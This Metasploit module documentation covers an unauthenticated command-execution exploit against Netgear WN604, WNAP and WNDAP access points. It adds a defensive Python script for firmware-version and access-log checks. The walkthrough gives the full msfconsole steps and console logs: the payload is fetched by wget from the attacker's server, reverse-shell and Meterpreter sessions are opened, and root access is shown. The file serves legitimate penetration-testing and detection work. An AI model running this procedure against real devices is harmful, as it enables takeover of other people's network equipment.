metasploit-gs/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
Imran E. Dawoodjee fcb0b90d7a Fixed numbering in the documentation steps, offed some whitespace, streamlined the send_request_cgi, removed the conn_check.
2018-10-08 15:04:32 +06:30


The module netgear_unauth_exec leverages an unauthenticated arbitrary command execution vulnerability in several Netgear access points. Netgear WN604 before 3.3.3, and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0, are vulnerable. The vulnerability lies in how the device handles POST requests to (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. It was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
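For the defender's side of the description above, the following is an added example (not part of the module or its documentation) that turns the two facts the paragraph gives, the fixed firmware versions per model and the five affected request handlers, into checks: one that classifies an inventory entry as patched or not, and one that flags POST requests to those handlers in a web access log. The log lines are constructed sample data in Apache combined-log layout; the real access points may log in a different format, so the regex is an assumption to adapt.

```python
import re
from typing import Iterable, List, Optional, Tuple

# First fixed firmware release per model, as stated in the module description.
FIXED_VERSIONS = {
    "WN604": "3.3.3",
    "WN802Tv2": "3.5.5.0",
    "WNAP210v2": "3.5.5.0",
    "WNAP320": "3.5.5.0",
    "WNDAP350": "3.5.5.0",
    "WNDAP360": "3.5.5.0",
    "WNDAP660": "3.5.5.0",
}

# The five request handlers named in the description.
VULN_ENDPOINTS = (
    "boardData102.php",
    "boardData103.php",
    "boardDataJP.php",
    "boardDataNA.php",
    "boardDataWW.php",
)


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn a dotted firmware string such as '3.5.4.9' into a tuple of ints."""
    return tuple(int(p) for p in v.strip().split("."))


def is_affected(model: str, version: str) -> Optional[bool]:
    """True if the firmware is older than the fixed release, False if at or
    above it, None if the model is not in the affected list at all."""
    fixed = FIXED_VERSIONS.get(model)
    if fixed is None:
        return None
    have, need = parse_version(version), parse_version(fixed)
    # Pad to equal length so '3.5.5' compares equal to '3.5.5.0'.
    width = max(len(have), len(need))
    have += (0,) * (width - len(have))
    need += (0,) * (width - len(need))
    return have < need


# Assumed log layout for the constructed sample below (Apache combined format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)


def flag_boarddata_posts(lines: Iterable[str]) -> List[dict]:
    """Return one record per POST aimed at an affected boardData*.php handler.
    Only POSTs are flagged, because that is the request type the description
    names; the query string is stripped before matching the file name."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        endpoint = path.rsplit("/", 1)[-1]
        if m.group("method") == "POST" and endpoint in VULN_ENDPOINTS:
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "endpoint": endpoint,
                "status": int(m.group("status")),
            })
    return hits


# Constructed sample access-log lines; addresses mirror the lab layout in
# the walkthrough below and are not real observations.
SAMPLE_LOG = [
    '192.168.0.50 - - [08/Oct/2018:11:30:01 +0630] "GET /index.php HTTP/1.1" 200 2048',
    '192.168.0.50 - - [08/Oct/2018:11:30:05 +0630] "GET /boardDataNA.php HTTP/1.1" 200 800',
    '192.168.0.99 - - [08/Oct/2018:11:31:40 +0630] "POST /boardDataNA.php HTTP/1.1" 200 512',
    '192.168.0.99 - - [08/Oct/2018:11:31:41 +0630] "POST /boardDataWW.php?x=1 HTTP/1.1" 200 512',
    'not a log line at all',
]


if __name__ == "__main__":
    for model, version in [("WN604", "3.3.2"), ("WNAP320", "3.5.5"), ("R7000", "1.0")]:
        print(model, version, "affected:", is_affected(model, version))
    for hit in flag_boarddata_posts(SAMPLE_LOG):
        print("POST to affected handler:", hit)
```

In the inventory check, a model outside the list returns None rather than False so that "not in scope" is never confused with "patched". In the log check, a 200 response to such a POST is only a lead: the description says these handlers are reachable without authentication, so any POST to them from an address that is not the management host is worth a look, and a device still on a pre-fix firmware should be updated or have its web interface restricted to a management network.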

Vulnerable Application

  1. Start msfconsole
  2. Do : use exploit/linux/http/netgear_unauth_exec
  3. Do : set RHOST [RouterIP]
  4. Do : set SRVHOST [Your server's IP]
  5. Do : set LHOST [Your IP]
  6. Do : set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp if you want meterpreter session
  7. Do : exploit
  8. If the router is vulnerable, the payload is fetched via wget from the web service started on SRVHOST, executed on the device, and you should obtain a session

Example with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
[*] Sending the payload to the server...
[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
[+] Deleted /tmp/IXjlVHwcHNUELM

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
whoami
root

Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
[*] Sending the payload to the server...
[*] Sending stage (1108408 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
[+] Deleted /tmp/UcyqnUAGQ

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.0.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >